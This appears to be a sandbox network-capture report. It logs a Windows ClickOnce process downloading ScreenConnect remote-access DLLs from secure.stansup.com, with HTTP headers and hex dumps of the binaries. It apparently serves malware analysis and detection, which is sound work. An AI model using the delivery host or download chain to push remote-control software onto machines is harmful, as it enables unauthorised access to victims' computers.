                                                                                                                                                                                                                                                      8192.168.2.54973579.110.49.1854433056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:29:36 UTC119OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-10-25 17:29:36 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 197120
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:29:36 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:29:36 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1e 35 ea eb 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 5d ca 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5" 0 `]@
                                                                                                                                                                                                                                                      2024-10-25 17:29:36 UTC16384INData Raw: 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06
                                                                                                                                                                                                                                                      Data Ascii: &rYpov&(, ow&}ow&o)**.(*&(**^uw,w(***0@surpov&rYpov&(, ow&}ow&o)**.(*&(**^ux,x(***0@su
                                                                                                                                                                                                                                                      2024-10-25 17:29:36 UTC16384INData Raw: 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 17 28 1e 04 00 06 de 19 02 7b 04 01 00 04 6f 37 02 00 0a 02 28 14 04 00 06 dc 06
                                                                                                                                                                                                                                                      Data Ascii: ~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&({o7(
                                                                                                                                                                                                                                                      2024-10-25 17:29:37 UTC16384INData Raw: 47 1f 16 00 f6 03 58 1f 16 00 30 07 69 1f 16 00 ab 08 47 1f 16 00 30 04 71 1f 16 00 4d 07 7b 1f 16 00 01 00 85 1f 16 00 3b 03 85 1f 06 00 ce 72 8e 1f 06 00 69 5c 9d 1d 06 00 ce 72 8e 1f 06 00 a5 75 8e 1d 01 00 e3 74 93 1f 01 00 e5 59 a9 10 01 00 50 37 99 1f 36 00 56 0a 9e 1f 16 00 8a 02 a3 1f 36 00 56 0a af 1f 16 00 a0 00 a3 1f 36 00 56 0a e6 11 16 00 70 00 dc 11 16 00 94 03 52 12 06 00 12 81 64 07 06 00 06 63 b4 11 06 00 7b 6d 0f 11 06 00 ce 72 b9 11 06 00 71 32 c6 11 06 00 9c 79 cb 11 06 00 90 83 a6 10 06 00 a9 62 2c 13 06 00 ce 72 b9 11 06 00 19 0d 58 04 06 00 26 77 b4 1f 06 00 ce 72 b9 1f 06 00 ac 65 7a 1e 06 00 7d 5d cb 11 36 00 56 0a be 1f 16 00 6c 01 c3 1f 06 00 ce 72 d5 1f 06 00 12 81 2a 1f 06 00 1a 63 da 1f 06 00 e4 7d 74 1d 06 00 79 59 ec 1f 06
                                                                                                                                                                                                                                                      Data Ascii: GX0iG0qM{;ri\rutYP76V6V6VpRdc{mrq2yb,rX&wrez}]6Vlr*c}tyY
                                                                                                                                                                                                                                                      2024-10-25 17:29:37 UTC16384INData Raw: 00 00 00 00 c4 01 1e 2a ce 2b e8 03 8c b2 00 00 00 00 94 00 7b 3e d8 2b e9 03 00 00 00 00 00 00 c4 05 42 64 e2 2b ea 03 2f b3 00 00 00 00 81 00 bc 71 e2 2b eb 03 50 b3 00 00 00 00 c4 00 58 10 d1 21 ec 03 a0 b9 00 00 00 00 81 00 81 2a e9 2b ed 03 08 ba 00 00 00 00 91 00 00 0f f8 2b f0 03 a0 ba 00 00 00 00 81 00 6a 09 08 2c f4 03 c0 ba 00 00 00 00 91 18 97 66 aa 20 f5 03 cc ba 00 00 00 00 86 18 91 66 01 00 f5 03 d4 ba 00 00 00 00 83 00 87 01 0f 2c f5 03 f3 ba 00 00 00 00 91 18 97 66 aa 20 f6 03 ff ba 00 00 00 00 86 18 91 66 01 00 f6 03 07 bb 00 00 00 00 83 00 3a 00 20 2c f6 03 0f bb 00 00 00 00 83 00 74 03 27 2c f7 03 17 bb 00 00 00 00 83 00 a3 01 78 29 f8 03 2a bb 00 00 00 00 86 18 91 66 01 00 f9 03 32 bb 00 00 00 00 83 00 b9 02 76 07 f9 03 56 bb 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: *+{>+Bd+/q+PX!*++j,f f,f f: ,t',x)*f2vV
                                                                                                                                                                                                                                                      2024-10-25 17:29:37 UTC16384INData Raw: 41 13 6b 00 a0 1c 60 13 6b 00 a0 1c 61 13 1a 00 db 2e 61 13 6b 00 a0 1c 80 13 6b 00 a0 1c a3 13 6b 00 a0 1c c3 13 6b 00 a0 1c e1 13 6b 00 a0 1c e3 13 6b 00 a0 1c 01 14 6b 00 a0 1c 03 14 6b 00 a0 1c 21 14 6b 00 a0 1c 41 14 6b 00 a0 1c 60 14 6b 00 a0 1c 61 14 6b 00 a0 1c 63 14 6b 00 a0 1c 81 14 6b 00 a0 1c 83 14 6b 00 a0 1c a0 14 6b 00 a0 1c a1 14 6b 00 a0 1c c1 14 6b 00 a0 1c c3 14 6b 00 a0 1c e1 14 6b 00 a0 1c e3 14 6b 00 a0 1c 01 15 6b 00 a0 1c 03 15 6b 00 a0 1c 21 15 6b 00 a0 1c 23 15 6b 00 a0 1c 41 15 1a 00 5c 2f 41 15 6b 00 a0 1c 44 15 c2 05 a0 1c 61 15 6b 00 a0 1c 63 15 6b 00 a0 1c 80 15 6b 00 a0 1c 81 15 6b 00 a0 1c 83 15 6b 00 a0 1c a0 15 6b 00 a0 1c a1 15 1a 00 db 2e a1 15 6b 00 a0 1c a3 15 6b 00 a0 1c c0 15 6b 00 a0 1c c1 15 6b 00 a0 1c c3 15 6b
                                                                                                                                                                                                                                                      Data Ascii: Ak`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kA\/AkDakckkkkk.kkkkk
                                                                                                                                                                                                                                                      2024-10-25 17:29:37 UTC16384INData Raw: 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 49 42 69 74 6d 61 70 44 61 74 61 00 62 69 74 6d 61 70 44 61 74 61 00 64 61 74 61
                                                                                                                                                                                                                                                      Data Ascii: equestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationDataIBitmapDatabitmapDatadata
                                                                                                                                                                                                                                                      2024-10-25 17:29:37 UTC16384INData Raw: 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 63 65 69 76 65
                                                                                                                                                                                                                                                      Data Ascii: Monitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnect.Properties.CommandReceive
                                                                                                                                                                                                                                                      2024-10-25 17:29:37 UTC16384INData Raw: 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00 75
                                                                                                                                                                                                                                                      Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVolu
                                                                                                                                                                                                                                                      2024-10-25 17:29:37 UTC16384INData Raw: 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06 01
                                                                                                                                                                                                                                                      Data Ascii: tMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      9192.168.2.54975379.110.49.1854433056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:29:38 UTC96OUTGET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      2024-10-25 17:29:39 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 1721856
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:29:38 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:29:39 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f8 ae 85 b3 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 92 5c 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 a5 6f 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL" 0>\ ` o@
                                                                                                                                                                                                                                                      2024-10-25 17:29:39 UTC16384INData Raw: 00 0a 99 00 0c 00 00 00 00 02 00 81 00 24 a5 00 0c 00 00 00 00 02 00 73 00 7d f0 00 07 00 00 00 00 02 00 06 00 f1 f7 00 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 de 00 00 06 72 71 06 00 70 28 01 02 00 0a 0a 02 06 28 bb 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 bc 00 00 06 18 8d d6 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 02 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 03 02 00 0a 73 04 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0b 01 00 06 1f 0a 16 20 7c 4f 00 00 73 06 02 00 0a 28 6e 01 00 0a 2c 35 20 05 01 00 00 73 07 02 00 0a 0a 06 6f 08 02 00 0a 06 28 ea 01 00 06 0b 07 16 30 0b 28 c0 01 00 0a 28 c7 00 00 06 7a 06 16 07 6f 09 02
                                                                                                                                                                                                                                                      Data Ascii: $s}0*(~^(rqp((*0G%-&(%rp%rp(~%-&s%(2+*0:( |Os(n,5 so(0((zo
                                                                                                                                                                                                                                                      2024-10-25 17:29:39 UTC16384INData Raw: fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c cb 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4b 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 51 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a 02 15 7d fd 00 00 04 1f 09 0b 02 17 07 25 17 58 0b 1f 1f 5f 62 8d d8 00 00 01 7d 00 01 00 04 02 7b 00 01 00 04 8e 69 d0 d8 00 00 01 28 51 00 00 0a 28 0f 02 00 0a 5a 0c 02 7b 00 01 00 04 08
                                                                                                                                                                                                                                                      Data Ascii: (-*{*s{z2{*0<{3{(NoO3}+sK{}*(Q*z(,}(NoO}**0{,;*}%X_b}{i(Q(Z{
                                                                                                                                                                                                                                                      2024-10-25 17:29:39 UTC16384INData Raw: 00 37 cc 76 22 06 00 7e 54 76 22 06 00 81 90 76 22 06 00 66 a3 76 22 06 00 43 aa 76 22 06 00 ad cf 79 22 06 00 bc 45 79 22 06 00 54 46 76 22 06 00 ce 58 76 22 06 00 6c bf 76 22 06 00 f8 69 76 22 06 00 56 9f 76 22 06 00 af 60 76 22 06 00 fe ce 76 22 06 00 bb 5f 76 22 06 00 d3 51 2d 25 06 00 99 be 76 22 06 00 11 be 76 22 06 10 24 51 ff 25 06 06 80 30 af 08 56 80 36 c8 03 26 56 80 1f c8 03 26 06 06 80 30 af 08 56 80 fc 9c 08 26 06 06 80 30 af 08 56 80 62 27 0d 26 56 80 90 29 0d 26 56 80 b9 0d 0d 26 56 80 86 29 0d 26 06 06 80 30 76 22 56 80 2c 39 12 26 56 80 4d c8 12 26 56 80 5f 39 12 26 56 80 16 bd 12 26 56 80 d2 9b 12 26 56 80 e8 c0 12 26 56 80 72 7f 12 26 56 80 12 c8 12 26 56 80 ae 9b 12 26 56 80 71 88 12 26 56 80 c1 6c 12 26 56 80 b0 6c 12 26 56 80 88 6b
                                                                                                                                                                                                                                                      Data Ascii: 7v"~Tv"v"fv"Cv"y"Ey"TFv"Xv"lv"iv"Vv"`v"v"_v"Q-%v"v"$Q%0V6&V&0V&0Vb'&V)&V&V)&0v"V,9&VM&V_9&V&V&V&Vr&V&V&Vq&Vl&Vl&Vk
                                                                                                                                                                                                                                                      2024-10-25 17:29:39 UTC16384INData Raw: a5 00 00 00 00 83 00 c1 07 09 3b 0d 07 71 a5 00 00 00 00 91 18 df 98 16 27 0e 07 7d a5 00 00 00 00 86 18 b4 98 01 00 0e 07 85 a5 00 00 00 00 83 00 8e 02 27 3b 0e 07 8d a5 00 00 00 00 83 00 14 0a 27 3b 0f 07 95 a5 00 00 00 00 86 18 b4 98 05 00 10 07 b4 a5 00 00 00 00 e1 01 73 58 01 00 11 07 ec a5 00 00 00 00 e1 01 ed c1 3d 00 11 07 b8 a7 00 00 00 00 81 00 ab 0d 01 00 11 07 d4 a7 00 00 00 00 e1 09 86 bb e8 18 11 07 dc a7 00 00 00 00 e1 01 c9 b5 01 00 11 07 e3 a7 00 00 00 00 e1 09 4c bc 4e 00 11 07 ec a7 00 00 00 00 e1 01 84 97 2e 3b 11 07 40 a8 00 00 00 00 e1 01 50 98 64 00 11 07 00 00 01 00 80 6b 00 00 01 00 68 a5 00 00 01 00 80 6b 00 00 01 00 bd 5e 00 00 01 00 68 a5 00 00 01 00 bd 5e 00 00 01 00 ba 74 00 00 01 00 02 a7 00 00 01 00 ba 74 00 00 01 00 8c ca
                                                                                                                                                                                                                                                      Data Ascii: ;q'}';';sX=LN.;@Pdkhk^h^tt
                                                                                                                                                                                                                                                      2024-10-25 17:29:39 UTC16384INData Raw: 4c 7c 04 39 02 fc 6f 89 01 99 02 a9 6a 7c 04 99 02 ef 58 43 1b 99 07 e2 6a 3d 0b 4c 04 6f 98 5b 00 54 04 6b bc 49 00 44 02 81 0d d9 00 08 00 14 00 2d 1c 08 00 18 00 32 1c 08 00 1c 00 37 1c 08 00 20 00 3c 1c 08 00 b8 00 41 1c 0e 00 bc 00 46 1c 0e 00 c0 00 59 1c 0e 00 c4 00 6a 1c 08 00 c8 00 7d 1c 08 00 cc 00 82 1c 0e 00 d0 00 87 1c 0e 00 d4 00 96 1c 0e 00 d8 00 a5 1c 0e 00 e0 00 ce 1c 08 00 f0 00 6c 1d 08 00 f4 00 71 1d 08 00 f8 00 76 1d 08 00 1c 01 2d 1c 08 00 20 01 32 1c 08 00 24 01 37 1c 09 00 28 01 32 1c 09 00 2c 01 37 1c 09 00 30 01 7b 1d 09 00 34 01 80 1d 09 00 38 01 32 1c 09 00 3c 01 37 1c 09 00 40 01 32 1c 09 00 44 01 37 1c 09 00 48 01 7b 1d 09 00 4c 01 80 1d 09 00 50 01 85 1d 09 00 54 01 8a 1d 09 00 58 01 8f 1d 09 00 5c 01 94 1d 09 00 60 01 99 1d
                                                                                                                                                                                                                                                      Data Ascii: L|9oj|XCj=Lo[TkID-27 <AFYj}lqv- 2$7(2,70{482<7@2D7H{LPTX\`
                                                                                                                                                                                                                                                      2024-10-25 17:29:39 UTC16384INData Raw: 6e 49 6e 66 6f 73 3e 62 5f 5f 32 38 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 31 35 39 5f 31 00 55 53 45 52 5f 49 4e 46 4f 5f 31 00 3c 52 65 70 6c 61 63 65 57 6e 64 50 72 6f 63 3e 62 5f 5f 31 00 3c 52 75 6e 43 6f 6d 6d 61 6e 64 4c 69 6e 65 50 72 6f 67 72 61 6d 3e 62 5f 5f 31 00 3c 47 65 74 44 65 73 6b 74 6f 70 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 44 65 73 63 65 6e 64 65 6e 74 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 57 69 6e 64 6f 77 53 74 61 74 69 6f 6e 4e 61 6d 65 73 3e
                                                                                                                                                                                                                                                      Data Ascii: nInfos>b__28_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>c__DisplayClass159_1USER_INFO_1<ReplaceWndProc>b__1<RunCommandLineProgram>b__1<GetDesktopWindowHandles>b__1<GetWindowHandles>b__1<GetDescendentWindowHandles>b__1<GetWindowStationNames>
                                                                                                                                                                                                                                                      2024-10-25 17:29:40 UTC16384INData Raw: 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c 70 46 69 6c 65 00 70 4f 75 74 70 75 74 46 69 6c 65 00 70 73 7a 46 69 6c 65 00 43 72 65 61 74 65 50 72 6f 66 69 6c 65 00 44 65 6c 65 74 65 50 72 6f 66 69 6c 65 00 75 73 72 69 34 5f 70 72 6f 66 69 6c 65 00 70 70 66 69 6c 65 00 45 52 6f 6c 65 00 72 6f 6c 65 00 41 6c 6c 6f 63 43 6f 6e 73 6f 6c 65 00 46 72 65 65 43 6f 6e 73 6f 6c 65 00 77 42 69 74 73 50 65 72 53 61 6d 70 6c 65 00 6c 70 54 69 74 6c 65 00 41 64 64 41 63 63 65 73 73 52 75 6c 65 00 46 69 6c 65 53 79 73 74 65 6d 41 63 63 65 73 73 52 75 6c 65 00 53 65 74 41 63 63 65 73 73 52
                                                                                                                                                                                                                                                      Data Ascii: leMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHelpFilepOutputFilepszFileCreateProfileDeleteProfileusri4_profileppfileERoleroleAllocConsoleFreeConsolewBitsPerSamplelpTitleAddAccessRuleFileSystemAccessRuleSetAccessR
                                                                                                                                                                                                                                                      2024-10-25 17:29:40 UTC16384INData Raw: 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e 4c 69 6e 71 00 50 72 6f 70 56 61 72 69 61 6e 74 43 6c 65 61 72 00 45 6e 73 75 72 65 53 74 61 72 74 73 57 69 74 68 43 68 61 72 00 43 6f 6e 76 65 72 74 42 6f 74 68 53 6c 61 73 68 65 73 54 6f 43 68 61 72 00 44 69 72 65 63 74 6f 72 79 53 65 70 61 72 61 74 6f 72 43 68 61 72 00 70 72 6f 70 76 61 72 00 65 5f 63 70 61 72 68 64 72 00 49 73 4d 65 6d 62 65 72 00 6d 61 67 69 63 4e 75 6d 62 65 72 00 64 77 42 75 69 6c 64 4e 75 6d 62 65 72 00 46 69 6c 65 48 65 61 64 65 72 00 77 61 76 65 49 6e 50 72 65 70 61 72 65 48 65 61 64 65 72 00 77 61 76 65 4f 75 74 50 72 65 70 61 72 65 48
                                                                                                                                                                                                                                                      Data Ascii: LastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.LinqPropVariantClearEnsureStartsWithCharConvertBothSlashesToCharDirectorySeparatorCharpropvare_cparhdrIsMembermagicNumberdwBuildNumberFileHeaderwaveInPrepareHeaderwaveOutPrepareH
